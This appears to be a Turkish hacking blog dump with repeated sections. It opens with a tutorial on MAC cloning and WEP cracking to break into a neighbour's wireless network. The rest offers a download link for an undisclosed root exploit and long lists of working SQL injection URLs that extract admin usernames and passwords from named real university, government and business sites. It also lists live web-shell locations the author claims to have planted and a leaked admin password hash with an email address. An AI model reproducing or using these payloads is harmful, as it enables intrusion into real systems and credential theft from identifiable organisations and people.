Bu komutta yapmak istedigimiz islem su: 5. kanaldaki yayinlari eth0 arabirimindeki kablosuz ag cihazi ile yakalayip yakalanan verileri ’dosya’ ismiyle kaydettiriyoruz. Burada lütfen yazdigimiz komuttaki parametrelere dikkat edin. Ayni denemeyi siz yapacaksiniz, kullanacaginiz kanal ve arabirim (eth0) farkli olacaktir. BIzim test sistemimizde eth0 kablosuz ag karti, eth1 ise ethernet kartina denk geliyor. Siz sisteminizde wlan0 wlan1 isimler kullanmak zorunda kalabilirsiniz. simdi dinlemeye basliyoruz. Birkaç saniye beklediginizde aga bagli cihazlar tek tek dökülmeye baslayacak

Resim 2 de ilk üç cihaz dogrudan kablosuz modeme baglanmis durumda. Diger dördüncü bilgisayarin ise muhtemelen kablosuz ag adaptörü açik ama herhangi bir modeme bagli degil. Büyük ihtimalle listedeki ilk 3 MAC adresinin modemden izni var. Bu yüzden bu MAC adresleri klonlayarak bu modeme erisim saglayabilecegimizi düsünüyoruz. simdi cd yi çikartip yeniden Windows’a dönme zamani geldi. Windows’ta MAC adresimizi degistirmeyi deneyecegiz. Bazi kablosuz ag kartlari MAC adresinizi dogrudan degistirmenize izin veriyor. Eger siz de bu kartlardan birini kullaniyorsaniz isiniz çok kolay. Masaüstündeki "Ag Baglantilarim" a sag tiklayip "Özellikler" menüsünü seçin. "Yapilandir" butonuna basin ve "Gelismis" sekmesine geçin. Listede ’Mac Adresi’ gibi bir seçenek olmasi gerekiyor. Buradan Deger kismina not ettigimiz MAC adreslerinden birini giriyoruz. OK tusuna bastiginizda artik MAC adresinizin degismis olmasi lazim. Artik MAC adres filtreleme metoduyla güvenlik saglamaya çalisan blackwhite agina baglanabilirsiniz. Eger sizin ag
kartiniz MAC adresini degistirmenize izin vermiyorsa sorun degil. MAC adresini degistiren birçok program bulabilirsiniz. Ama bu programlar deneme sürümlerinde MAC adresini rasgele degistirir.
Yani sizin istediginiz MAC adresini girmenize izin vermez. Bu yüzden eger parasini verip programi satin almayacaksaniz, ayni islemi kayit defteri üzerinden de yapabilirsiniz

Kayit Defterinden MAC Adresini Degistirmek

Bu isleme baslamadan önce kayit defterinizin yedegini almayi unutmayin. Eger yanlis bir islem yaparsaniz sisteminiz zarar görebilir. MAC adresini degistirmek için önce "Baslat" menüsünden "Çalistir" a gelin ve "cmd" yazarak komut satirina geçin. Kablosuz ag adaptörünüz takili ve çalisir durumdayda su komutu yazin: net config rdr



simdi resim 3 teki gibi bir ekran görüyor olmalisiniz. Bu ekranda gördügünüz ayraçlar içindeki uzunca bölüm GUID (Globally Unique ID) numarasidir. Hemen onun yanindaki ise MAC adresiniz.. GUID numarasini bir kenara not edin. "Baslat" menüsünden "Çalistir" a gelip regedit yazin. HKEY_LOCAL_MACHINE\\\\\\\\\\\\\\\\SYST EM\\\\\\\\\\\\\\\\CurrentControlSet\\\\\\ \\\\\\\\\\Control\\\\\\\\\\\\\\\\Class yolunu izleyin ve bu yolun sonunda GUID numaranizi bulun. Alt alta 0000, 0001 gibi klasörlerle karsilasacaksiniz. Bu klasörlere tiklayarak AdapterModel kisminda Wireless adaptörünüzü bulmaya çalisin. Dogru adaptörü buldugunuzda alt satirlardan NetworkAdress kismi karsiniza çikacaktir. Burada yapmaniz gereken, MAC adresinizi istediginiz baska bir adresle degistirmek. Aslinda MAC adres korumali bir aga girmek için ihtiyaciniz olan bilgileri Windows altinda çalisan NetStumbler isimli programla elde edebilirsiniz. Ancak biz WEP ve WPA sifrelerini de kirarken back track i kullanacagimiz için konuyu dagitmamak adina NetStumbler i ise karistirmadik.

WEP SIFRELERINI KIRMAK

WEP sifreleri 10 hanelidir ve içinde sadece A’dan F’ye kadar harfler ve 0 dan 9 a kadar rakamlar bulunur. Bu yüzden de kombinasyon sayisi sinirlidir. Yani kirilmasi daha kolaydir. Günümüzde bu sifreleme yetersiz kaldigindan daha güvenli olan WPA sifreleme yöntemi gelistirilmistir. WEP in hala kullaniliyor olmasinin nedeni ise kismen geriye dönük uyumluluk, kismen kablosuz dagitim sistemini desteklemesidir. WEP yönteminin nasil kirildigina geçmeden önce basit bir sekilde WEP yönteminin nasil islediginden bahsedelim. WEP yönteminde kablosuz ag dagiticisi, modem ya da router kendine bir istek geldiginde rastgele 128 bitlik bir metin olusturup kablosuz baglantiyi yapacak cihaza (notebook, PDA vs) gönderir. Cihaz kendisindeki WEP sifresi ile bu gelen manasiz metni sifreler ve geri gönderir. Modem kendisine gelen sifreli metnin dogru sifrelenip sifrelenmedigine bakarak baglantiyi onaylar ya da reddeder. Bu arada baglantiyi dinleyen bir kisi rast gele seçilen 128 bitlik veriyi ve daha sonra bu verinin sifrelenmis halini yakalayabilir. Ama WEP ise sifrelenmis verilerin içerisinde intialization Cector (IV) denen datalar kullanilir. Bu IV datalari her pakette degisir. Yani modem üzerinde ne kadar trafik varsa o kadar çok IV vardir. IV datalari, paket içerisinde sifrelenmez çünkü bu datalar tekrar açilirken bu IV ler kullanilacaktir. IV’lerin amaci ayni metnin iki kez geçilmesi durumunda farkli sifrelenmis datalar olusmasini engellemektir. IV datalari 24 bit uzunlugundadir. Bu yüzden 64 bit WEP ise sifrelenmis bir data aslinda 40 bittir. Çünkü 24 bit IV’den olusmaktadir. 24 bit kisa bir dizi oldugundan trafik arttikça IV’ler tekrar girebilir. iste WEP’in kirilma fikrinin ana temasi da buradan ortaya çikiyor. Amaç tekrar eden IV’leri yakalamak. Tabii isin mantigi bu kadar kolay degil. Ama olayin pratikteki kullanimini anlatabilmemiz için simdlik bu kadari yeterli.

Hedefi Tespit Etmek


Simdi amacimiz blackwhite kablosuz agina davetsiz olarak misafir olarak girmek ve yüksek hizda internet baglantisina erisebilmek. Bunun için öncelikle blackwhite agi hakkinda bilgi alacagiz. Sonra bu agdaki sifreli paketlerden toplayabildigimiz kadar toplayacagiz ve son olarak da sifreyi kirmayi deneyecegiz. ilk olarak Kismet isimli programi çalistiriyoruz. Kismet açildiktan kisa bir süre sonra blackwhite agini görüyoruz

Linux Root(0d4y local root exploit) Videos !h

S.a arkadaşlar yine sizlere güzel bir video çektim videomuzda linux 0d4y local root exploit ile dahan önce root olunamayan kerneli rootlamış bulunmaktayım kernel versiyon = 2008 ama varsa rootlayacak biri vereyim rootlarsa delikanlı gibi helal olsun diyecem =)

Download : http://yurdumshop.com/0d4ylocalroot.zip

Selametle videoda kullandığım expler hiç bir güvenlik sitesinde mevcut değildir

~ ./Heart

Linux Root(0d4y local root exploit) Videos !h

S.a arkadaşlar yine sizlere güzel bir video çektim videomuzda linux 0d4y local root exploit ile dahan önce root olunamayan kerneli rootlamış bulunmaktayım kernel versiyon = 2008 ama varsa rootlayacak biri vereyim rootlarsa delikanlı gibi helal olsun diyecem =)

Download : http://yurdumshop.com/0d4ylocalroot.zip

Selametle videoda kullandığım expler hiç bir güvenlik sitesinde mevcut değildir

~ ./Heart

SQL injection açıklı siteler

http://www.bote.yildiz.edu.tr/v2/index.php?option=com_mezun&task=edit&hidemainmenu=0&id=-99999 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from jos_users

http://stat.ogu.edu.tr/atalay/index.php?option=com_mezun&task=edit&hidemainmenu=1&id=-601 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12 from jos_users

http://www.circassiancommunity.com/webroot/cb-newsdetail.php?token=7eab9310c5fb03ed4149c55e3130449b&news_id=-17 UNION SELECT 1,2,admin_login,admin_password,admin_mail,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from cc_admins

http://belediyemdergisi.net/kategori.php?id=-8 UNION SELECT 1,kuladi,3,4,5,ksifre,7 from yonetim

http://www.medyabu.com/haber_detay.php?id=-1250 UNION SELECT 1,2,3,k_adi,sifre,6,7,8,9,10,11,12,13,14 from kullanicilar

http://www.gunisigigazetesi.net/cikti1.php?id=-1 UNION SELECT 1,2,3,4,kullanici_adi,sifre,7,8 from yoneticiler

http://www.psikoturk.net/kategori.php?iid=-16 UNION SELECT 1,login,password,4,5,6,7,8,9,10,11,12,13 from users

http://www.merhaba.info/haberler/devami.php?id=-10967 UNION SELECT 1,2,3,4,5,name,pwd,usr,9,10,11,12,13,14,15,16,17 from logon

http://www.altanplastik.com.tr/haber.php?id=-3 UNION SELECT 1,2,user,pass from users

http://www.cosarkomur.com.tr/duyuru.php?id=-1%20UNION%20SELECT%201,user,3,pass%20from%20users

http://genaygayrimenkul.com/?sayfa=ek_sayfa&id=-11 UNION SELECT 1,2,danisman_sifre,4,danisman_kullanici,6 from emlak_danisman

http://www.bigblue.com.tr/tr/main.php?page=basindan_detay&id=-1 UNION SELECT 1,username,3,4,5,password,7,8,9 from admin

http://www.hrantdink.org/tr/duyuru.php?id=-1 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables

http://www.rahimtarim.com/duyuru.php?id=-89 UNION SELECT 1,2,3,4,5,6,7,admin_password,9,10 from calendar_admin

http://egitimcemberi.com/haber_detay.php?id=-3 UNION SELECT 1,kuladi,3,sifsif,5 from siteuyeleri

http://www.istanbul.edu.tr/itf/ortopedi/yazdir.php?category=tarihce&category_name=Tarihçe&title_id=1&text_id=-1 UNION SELECT 1,2,3,password,email from users

http://www.sohbetagi.net/yazdir.php?id=-2598%20UNION%20SELECT%201,adminadi,3,adminsifre,5,6%20from%20admin

http://www.sohbette.in/yazdir.php?id=-2598%20UNION%20SELECT%201,adminadi,3,adminsifre,5,6%20from%20admin

http://www.ecesohbet.net/yazdir.php?id=-2598%20UNION%20SELECT%201,adminadi,3,adminsifre,5,6%20from%20admin

http://www.eee.deu.edu.tr/print.php?sid=-305 UNION SELECT 1,2,3,unhex(hex(concat_ws(0x3a,user,password))),5,6 from mysql.user--

http://www.eee.deu.edu.tr/print.php?sid=-305 UNION SELECT 1,2,3,unhex(hex(concat_ws(0x3a,name,pwd))),5,6 from nuke_authors--

http://www.joinvillecultural.sc.gov.br/noticia.php?cd_noticia=-975%20UNION%20SELECT%20nome,senha%20from%20usuario
http://www.camaradc.sc.gov.br/home/noticias.php?id=-169%20%20UNION%20SELECT%201,usuario,3,senha,5,6,7,8,9%20from%20admin

http://www.emsetur.se.gov.br/noticias.php?id=-414%20UNION%20SELECT%201,2,senha,login,5%20from%20acesso

http://wanning.hainan.gov.cn/v6/news/news.php?type=qiye_dt&id=-4714%20UNION%20SELECT%201,username,3,password,5,6,7,8,9,10,11,12,13,14,15%20from%20c_user

http://www.fundespi.pi.gov.br/noticias.php?id=-408%20UNION%20SELECT%201,2,3,4,table_name,6,7,8%20from%20information_schema.tables%20limit%2015,1
http://www.cmpa.mg.gov.br/noticias.php?id=-33%20UNION%20SELECT%201,table_name,3,4,5,6,7,8,9%20from%20information_schema.tables%20limit%2018,1

http://www.cmpa.mg.gov.br/noticias.php?id=-33%20UNION%20SELECT%201,usuario,3,senha,5,6,7,8,9%20from%20permissao MD5 KIRCAN

http://www.fundespi.pi.gov.br/noticias.php?id=-408%20UNION%20SELECT%201,2,3,4,table_name,6,7,8%20from%20information_schema.tables%20limit%2025,1

http://www.kimkimdir.gen.tr/yazdir.php?id=-22%20UNION%20SELECT%201,2,3,4,5,6,7,8,table_name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201,1
telekomun serveri
---------

http://azdavay.meb.gov.tr/haber/ayrinti.php?id=-1+union+select+0,concat(sifre,0x3a,kul_adi),2,3,4,5,6,7,8+from+uyeler

http://www.aliaga.pol.tr/sizdengelenlerayrinti.php?id=-152%20UNION%20SELECT%201,kullaniciadi,sifre%20from%20yonetimkullanicilar

http://www.lakatospal.hu/article_print.php?id=-145%20UNION%20SELECT%201,username,pw,4,5,6,7,8,9,10,11,12,13%20from%20users


http://www.emniyetemlak.com/ayrinti.php?id=-1 UNION SELECT 1,CONVERT(table_name USING latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.tables limit 17,1


http://salihlirehber.com/rehbercat.php?sayfa=1&category=-5 UNION SELECT 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name=CHAR(102, 105, 114, 109, 97, 108, 97, 114)

http://www.soma.web.tr/somailan/index.php?catid=-21 UNION SELECT 1,2

http://www.yozgatgazetesi.com/anketler.asp?islemID=101&ID=20+union+select+0+from+

http://www.vidinli.com/elemanilan/ayrinti.php?nopass=1&id=-962 UNION SELECT CONVERT(column_name USING latin1),2,3,4,5,6,7,8,9 from information_schema.columns where table_name=CHAR(101, 104, 99, 112, 119, 105, 107, 105, 95, 117, 115, 101, 114)

http://www.kimacaba.com/ayrinti.php?id=-2897%20UNION%20SELECT%201,column_name,3,4,5,6%20from%20information_schema.columns%20where%20table_name=%27biyografi%27%20limit%201,1

http://www.gal.k12.tr/oku.php?id=-182%20UNION%20SELECT%201,2,3,4,5,6,column_name,8,9,10,11%20from%20information_schema.columns%20where%20table_name=CHAR(97,%20100,%20109,%20105,%20110,%20100,%2097,%20116,%2097)

http://www.kmarasdernekler.gov.tr/haberler.php?id=-26+union+select+0,pass,2,kid,4+from+user

http://www.kmarasdernekler.gov.tr/haberler.php?id=-26+union+select+0,pass,2,kid,4+from+user


http://www.sanmarenerji.com/TR/urun-detay.php?id=-12 UNION SELECT 1,2,3,4,5,6,column_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.columns where table_name=CHAR(107, 117, 108, 108, 97, 110, 105, 99, 105) limit 6,1

http://www.opednews.com/populum/link.php?id=-83615%20UNION%20SELECT%201,2,3,4,table_name,6,7,8,9,10,11%20from%20information_schema.tables%20limit%2017,1

http://www.yuzeyislem-kumlama.com/haberler.php?id=-162 UNION SELECT 1,2,3,«ê from information_schema.tables limit 17,1

http://www.perdeciler.com/haberler.php?id=-162 UNION SELECT 1,2,3,4,5,6,eposta,pass,9,10,11,12,13 from members


http://clerideslegal.com/link.php?id=-261%20UNION%20SELECT%20password,2,3%20from%20users

http://theatreantidote.com/link.php?id=-261%20UNION%20SELECT%20password,2,3%20from%20users

http://www.ogilvy.com.cy/link.php?id=-261%20UNION%20SELECT%201,username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20users

http://skadsillustration.com/prints.php?id=-8 union select 1,2,table_name,4,5,6,7,8,9,10 from information_schema.tables limit 17,1

http://www.charlesritchie.com/prints.php?id=-346%20UNION%20SELECT%201,2,group_concat(%20column_name%20),4,5,6,7,8,9,10,11,12,13,14%20from%20information_schema.columns%20where%20table_name=CHAR(119,%20112,%2095,%20117,%20115,%20101,%20114,%20115)

http://www.darrencoldwell.com/prints.php?id=-20%20UNION%20SELECT%201,2,3,4,userPWD,6,userName%20from%20ob_users

http://www.artistanncoleman.com/prints.php?action=viewimage&id=-78 UNION SELECT 1,table_name,3,4,5,6,7,8,9,10,11,12 from information_schema.tables limit 17,1

http://www.casino-games-internet.com/ca/new.php?ID=-1741 UNION SELECT 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables limit 17,1

SQL injection açıklı siteler

http://www.bote.yildiz.edu.tr/v2/index.php?option=com_mezun&task=edit&hidemainmenu=0&id=-99999 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from jos_users

http://stat.ogu.edu.tr/atalay/index.php?option=com_mezun&task=edit&hidemainmenu=1&id=-601 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12 from jos_users

http://www.circassiancommunity.com/webroot/cb-newsdetail.php?token=7eab9310c5fb03ed4149c55e3130449b&news_id=-17 UNION SELECT 1,2,admin_login,admin_password,admin_mail,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from cc_admins

http://belediyemdergisi.net/kategori.php?id=-8 UNION SELECT 1,kuladi,3,4,5,ksifre,7 from yonetim

http://www.medyabu.com/haber_detay.php?id=-1250 UNION SELECT 1,2,3,k_adi,sifre,6,7,8,9,10,11,12,13,14 from kullanicilar

http://www.gunisigigazetesi.net/cikti1.php?id=-1 UNION SELECT 1,2,3,4,kullanici_adi,sifre,7,8 from yoneticiler

http://www.psikoturk.net/kategori.php?iid=-16 UNION SELECT 1,login,password,4,5,6,7,8,9,10,11,12,13 from users

http://www.merhaba.info/haberler/devami.php?id=-10967 UNION SELECT 1,2,3,4,5,name,pwd,usr,9,10,11,12,13,14,15,16,17 from logon

http://www.altanplastik.com.tr/haber.php?id=-3 UNION SELECT 1,2,user,pass from users

http://www.cosarkomur.com.tr/duyuru.php?id=-1%20UNION%20SELECT%201,user,3,pass%20from%20users

http://genaygayrimenkul.com/?sayfa=ek_sayfa&id=-11 UNION SELECT 1,2,danisman_sifre,4,danisman_kullanici,6 from emlak_danisman

http://www.bigblue.com.tr/tr/main.php?page=basindan_detay&id=-1 UNION SELECT 1,username,3,4,5,password,7,8,9 from admin

http://www.hrantdink.org/tr/duyuru.php?id=-1 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables

http://www.rahimtarim.com/duyuru.php?id=-89 UNION SELECT 1,2,3,4,5,6,7,admin_password,9,10 from calendar_admin

http://egitimcemberi.com/haber_detay.php?id=-3 UNION SELECT 1,kuladi,3,sifsif,5 from siteuyeleri

http://www.istanbul.edu.tr/itf/ortopedi/yazdir.php?category=tarihce&category_name=Tarihçe&title_id=1&text_id=-1 UNION SELECT 1,2,3,password,email from users

http://www.sohbetagi.net/yazdir.php?id=-2598%20UNION%20SELECT%201,adminadi,3,adminsifre,5,6%20from%20admin

http://www.sohbette.in/yazdir.php?id=-2598%20UNION%20SELECT%201,adminadi,3,adminsifre,5,6%20from%20admin

http://www.ecesohbet.net/yazdir.php?id=-2598%20UNION%20SELECT%201,adminadi,3,adminsifre,5,6%20from%20admin

http://www.eee.deu.edu.tr/print.php?sid=-305 UNION SELECT 1,2,3,unhex(hex(concat_ws(0x3a,user,password))),5,6 from mysql.user--

http://www.eee.deu.edu.tr/print.php?sid=-305 UNION SELECT 1,2,3,unhex(hex(concat_ws(0x3a,name,pwd))),5,6 from nuke_authors--

http://www.joinvillecultural.sc.gov.br/noticia.php?cd_noticia=-975%20UNION%20SELECT%20nome,senha%20from%20usuario
http://www.camaradc.sc.gov.br/home/noticias.php?id=-169%20%20UNION%20SELECT%201,usuario,3,senha,5,6,7,8,9%20from%20admin

http://www.emsetur.se.gov.br/noticias.php?id=-414%20UNION%20SELECT%201,2,senha,login,5%20from%20acesso

http://wanning.hainan.gov.cn/v6/news/news.php?type=qiye_dt&id=-4714%20UNION%20SELECT%201,username,3,password,5,6,7,8,9,10,11,12,13,14,15%20from%20c_user

http://www.fundespi.pi.gov.br/noticias.php?id=-408%20UNION%20SELECT%201,2,3,4,table_name,6,7,8%20from%20information_schema.tables%20limit%2015,1
http://www.cmpa.mg.gov.br/noticias.php?id=-33%20UNION%20SELECT%201,table_name,3,4,5,6,7,8,9%20from%20information_schema.tables%20limit%2018,1

http://www.cmpa.mg.gov.br/noticias.php?id=-33%20UNION%20SELECT%201,usuario,3,senha,5,6,7,8,9%20from%20permissao MD5 KIRCAN

http://www.fundespi.pi.gov.br/noticias.php?id=-408%20UNION%20SELECT%201,2,3,4,table_name,6,7,8%20from%20information_schema.tables%20limit%2025,1

http://www.kimkimdir.gen.tr/yazdir.php?id=-22%20UNION%20SELECT%201,2,3,4,5,6,7,8,table_name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201,1
telekomun serveri
---------

http://azdavay.meb.gov.tr/haber/ayrinti.php?id=-1+union+select+0,concat(sifre,0x3a,kul_adi),2,3,4,5,6,7,8+from+uyeler

http://www.aliaga.pol.tr/sizdengelenlerayrinti.php?id=-152%20UNION%20SELECT%201,kullaniciadi,sifre%20from%20yonetimkullanicilar

http://www.lakatospal.hu/article_print.php?id=-145%20UNION%20SELECT%201,username,pw,4,5,6,7,8,9,10,11,12,13%20from%20users


http://www.emniyetemlak.com/ayrinti.php?id=-1 UNION SELECT 1,CONVERT(table_name USING latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.tables limit 17,1


http://salihlirehber.com/rehbercat.php?sayfa=1&category=-5 UNION SELECT 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name=CHAR(102, 105, 114, 109, 97, 108, 97, 114)

http://www.soma.web.tr/somailan/index.php?catid=-21 UNION SELECT 1,2

http://www.yozgatgazetesi.com/anketler.asp?islemID=101&ID=20+union+select+0+from+

http://www.vidinli.com/elemanilan/ayrinti.php?nopass=1&id=-962 UNION SELECT CONVERT(column_name USING latin1),2,3,4,5,6,7,8,9 from information_schema.columns where table_name=CHAR(101, 104, 99, 112, 119, 105, 107, 105, 95, 117, 115, 101, 114)

http://www.kimacaba.com/ayrinti.php?id=-2897%20UNION%20SELECT%201,column_name,3,4,5,6%20from%20information_schema.columns%20where%20table_name=%27biyografi%27%20limit%201,1

http://www.gal.k12.tr/oku.php?id=-182%20UNION%20SELECT%201,2,3,4,5,6,column_name,8,9,10,11%20from%20information_schema.columns%20where%20table_name=CHAR(97,%20100,%20109,%20105,%20110,%20100,%2097,%20116,%2097)

http://www.kmarasdernekler.gov.tr/haberler.php?id=-26+union+select+0,pass,2,kid,4+from+user

http://www.kmarasdernekler.gov.tr/haberler.php?id=-26+union+select+0,pass,2,kid,4+from+user


http://www.sanmarenerji.com/TR/urun-detay.php?id=-12 UNION SELECT 1,2,3,4,5,6,column_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.columns where table_name=CHAR(107, 117, 108, 108, 97, 110, 105, 99, 105) limit 6,1

http://www.opednews.com/populum/link.php?id=-83615%20UNION%20SELECT%201,2,3,4,table_name,6,7,8,9,10,11%20from%20information_schema.tables%20limit%2017,1

http://www.yuzeyislem-kumlama.com/haberler.php?id=-162 UNION SELECT 1,2,3,«ê from information_schema.tables limit 17,1

http://www.perdeciler.com/haberler.php?id=-162 UNION SELECT 1,2,3,4,5,6,eposta,pass,9,10,11,12,13 from members


http://clerideslegal.com/link.php?id=-261%20UNION%20SELECT%20password,2,3%20from%20users

http://theatreantidote.com/link.php?id=-261%20UNION%20SELECT%20password,2,3%20from%20users

http://www.ogilvy.com.cy/link.php?id=-261%20UNION%20SELECT%201,username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20users

http://skadsillustration.com/prints.php?id=-8 union select 1,2,table_name,4,5,6,7,8,9,10 from information_schema.tables limit 17,1

http://www.charlesritchie.com/prints.php?id=-346%20UNION%20SELECT%201,2,group_concat(%20column_name%20),4,5,6,7,8,9,10,11,12,13,14%20from%20information_schema.columns%20where%20table_name=CHAR(119,%20112,%2095,%20117,%20115,%20101,%20114,%20115)

http://www.darrencoldwell.com/prints.php?id=-20%20UNION%20SELECT%201,2,3,4,userPWD,6,userName%20from%20ob_users

http://www.artistanncoleman.com/prints.php?action=viewimage&id=-78 UNION SELECT 1,table_name,3,4,5,6,7,8,9,10,11,12 from information_schema.tables limit 17,1

http://www.casino-games-internet.com/ca/new.php?ID=-1741 UNION SELECT 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables limit 17,1

Shell Soktugum Hazır Siteler

http://www.issimo.net/portal2/tmp/ege.php 2.4.21 2009
http://www.saunot.com/tmp/ege.php

http://www.bigblue.com.tr/tr/reklamlar/ege.php
http://www.ysemarket.com/admin/backups/ege.php
http://www.ysemarket.com/moko.php?
http://www.dizaynet.net/patolojien/admin/fotoalbum/40.php
http://smf-tr.net/style.php
http://uzmankontor.net/deco57.php
http://www.ysemarket.com/admin/backups/ege.php
http://www.consumidorrs.com.br/rs2/main.php?p=http://webkanki.com/ege.txt?
http://www.cumhuriyetanadolulisesi.k12.tr/files/ege.php
http://www.mendereskaraer.com.tr/tmp/ege.php
http://www.tufanbeylilisesi.k12.tr/language/english.php
-----------------------------------------------------------------------------
http://festananet.com.br//pinte//forms/editor/img/ege.php
http://www.callcentercafe.com/uploads/Image/ege.php
http://www.intuitivesystems.com/assets/secimages/cmd.asp windows server..

http://www.kusadasi-oteller.com/bresim/conf.asp
http://eraresearch.com/inpressfiles/aspxshell.aspx
http://eraresearch.com/inpressfiles/cwshell.php
http://static.techsweek.com/init2.php
http://www.googlechrometr.com/xmlrp.php
http://www.necatibeyioo.k12.tr/ege.php?
http://www.farukcelik.com.tr/Upload/a203474ad9a581b438c66571fb0fbeb9.php
http://camaratga.mt.gov.br/admin/fotos/images/galeria/fotos_aereas/ege.php
http://www.reciclar-mt.com.br/admin/fotos/images/galeria/Educação Ambiental/ege.php
http://www.eksiogluimtas.com.tr/test/tmp/ege.php
http://tohumcular.com/ssss/wp-inc.php
http://www.mp3dinlermisin.com/wp-content/plugins/akismet/akismet.php
http://www.naturalhacker.com/wp-content/plugins/wp-e-commerce/ege.php

http://www.soyluanaokulu.com/html/tmp/ege.php http://www.soyluanaokulu.com/cgi-bin/cgiege.pl 2.6.18 2008
http://surucukursu.beyazpetrol.com/ege.php 2009
http://demo.uniwebtasarim.net/joomla/ja/ja_galena/tmp/ege.php
http://kiralikservers.com/tmp/ege.php
http://www.artspektif.com/d01/templates/beez/index.php 2008


Shellerin Üstüne İndex Basana Sanal Alem Bassın.!

Shell Soktugum Hazır Siteler

http://www.issimo.net/portal2/tmp/ege.php 2.4.21 2009
http://www.saunot.com/tmp/ege.php

http://www.bigblue.com.tr/tr/reklamlar/ege.php
http://www.ysemarket.com/admin/backups/ege.php
http://www.ysemarket.com/moko.php?
http://www.dizaynet.net/patolojien/admin/fotoalbum/40.php
http://smf-tr.net/style.php
http://uzmankontor.net/deco57.php
http://www.ysemarket.com/admin/backups/ege.php
http://www.consumidorrs.com.br/rs2/main.php?p=http://webkanki.com/ege.txt?
http://www.cumhuriyetanadolulisesi.k12.tr/files/ege.php
http://www.mendereskaraer.com.tr/tmp/ege.php
http://www.tufanbeylilisesi.k12.tr/language/english.php
-----------------------------------------------------------------------------
http://festananet.com.br//pinte//forms/editor/img/ege.php
http://www.callcentercafe.com/uploads/Image/ege.php
http://www.intuitivesystems.com/assets/secimages/cmd.asp windows server..

http://www.kusadasi-oteller.com/bresim/conf.asp
http://eraresearch.com/inpressfiles/aspxshell.aspx
http://eraresearch.com/inpressfiles/cwshell.php
http://static.techsweek.com/init2.php
http://www.googlechrometr.com/xmlrp.php
http://www.necatibeyioo.k12.tr/ege.php?
http://www.farukcelik.com.tr/Upload/a203474ad9a581b438c66571fb0fbeb9.php
http://camaratga.mt.gov.br/admin/fotos/images/galeria/fotos_aereas/ege.php
http://www.reciclar-mt.com.br/admin/fotos/images/galeria/Educação Ambiental/ege.php
http://www.eksiogluimtas.com.tr/test/tmp/ege.php
http://tohumcular.com/ssss/wp-inc.php
http://www.mp3dinlermisin.com/wp-content/plugins/akismet/akismet.php
http://www.naturalhacker.com/wp-content/plugins/wp-e-commerce/ege.php

http://www.soyluanaokulu.com/html/tmp/ege.php http://www.soyluanaokulu.com/cgi-bin/cgiege.pl 2.6.18 2008
http://surucukursu.beyazpetrol.com/ege.php 2009
http://demo.uniwebtasarim.net/joomla/ja/ja_galena/tmp/ege.php
http://kiralikservers.com/tmp/ege.php
http://www.artspektif.com/d01/templates/beez/index.php 2008


Shellerin Üstüne İndex Basana Sanal Alem Bassın.!

simcrest.com SQL injection

http://www.simcrest.com/company_news.php?id=-96 UNION SELECT 1,concat(username,0x3D,password,0x3D,Adauth),3,4,5,6,7,8 from simcrest_relay.relay_users

admin=7f0274a99146ae15eda88d85c3bf3cb9
http://www.simcrest.com/relay/ panel girişi..

http://www.simcrest.com/company_news.php?id=-96 UNION SELECT 1,concat(username,0x3D,password,0x3D,email),3,4,5,6,7,8 from users

redgell=b3ed48555a989b8ee27f613f7b5724dd=redgell@netsuccess.com

simcrest.com SQL injection

http://www.simcrest.com/company_news.php?id=-96 UNION SELECT 1,concat(username,0x3D,password,0x3D,Adauth),3,4,5,6,7,8 from simcrest_relay.relay_users

admin=7f0274a99146ae15eda88d85c3bf3cb9
http://www.simcrest.com/relay/ panel girişi..

http://www.simcrest.com/company_news.php?id=-96 UNION SELECT 1,concat(username,0x3D,password,0x3D,email),3,4,5,6,7,8 from users

redgell=b3ed48555a989b8ee27f613f7b5724dd=redgell@netsuccess.com

JOOMLA com_wcflm SQL injection

Acıgı Bulan : ByEge
Acık Türü : SQL İNJECTİON..
Site : h4ckz.com
Blog : byege.blogspot.com

google dork : inurl:com_wcflm

http:/localhost/index.php?option=com_wcflm&task=showList&flmlist_id=2&id= inj code..

http://wannadive.net/community/index.php?option=com_wcflm&task=showList&flmlist_id=2&id=-6306 UNION SELECT password from jos_users--

http://wannadive.net/community/index.php?option=com_wcflm&task=showList&flmlist_id=2&id=-6306 UNION SELECT username from jos_users--

JOOMLA com_wcflm SQL injection

Acıgı Bulan : ByEge
Acık Türü : SQL İNJECTİON..
Site : h4ckz.com
Blog : byege.blogspot.com

google dork : inurl:com_wcflm

http:/localhost/index.php?option=com_wcflm&task=showList&flmlist_id=2&id= inj code..

http://wannadive.net/community/index.php?option=com_wcflm&task=showList&flmlist_id=2&id=-6306 UNION SELECT password from jos_users--

http://wannadive.net/community/index.php?option=com_wcflm&task=showList&flmlist_id=2&id=-6306 UNION SELECT username from jos_users--

ByEge farkıyla Mp3 keyfi..

My Stuff

..

ByEge farkıyla Mp3 keyfi..

My Stuff

..

hehe

My Stuff

..

hehe

My Stuff

..

Blind SQL Injection

Blind SQL Injection

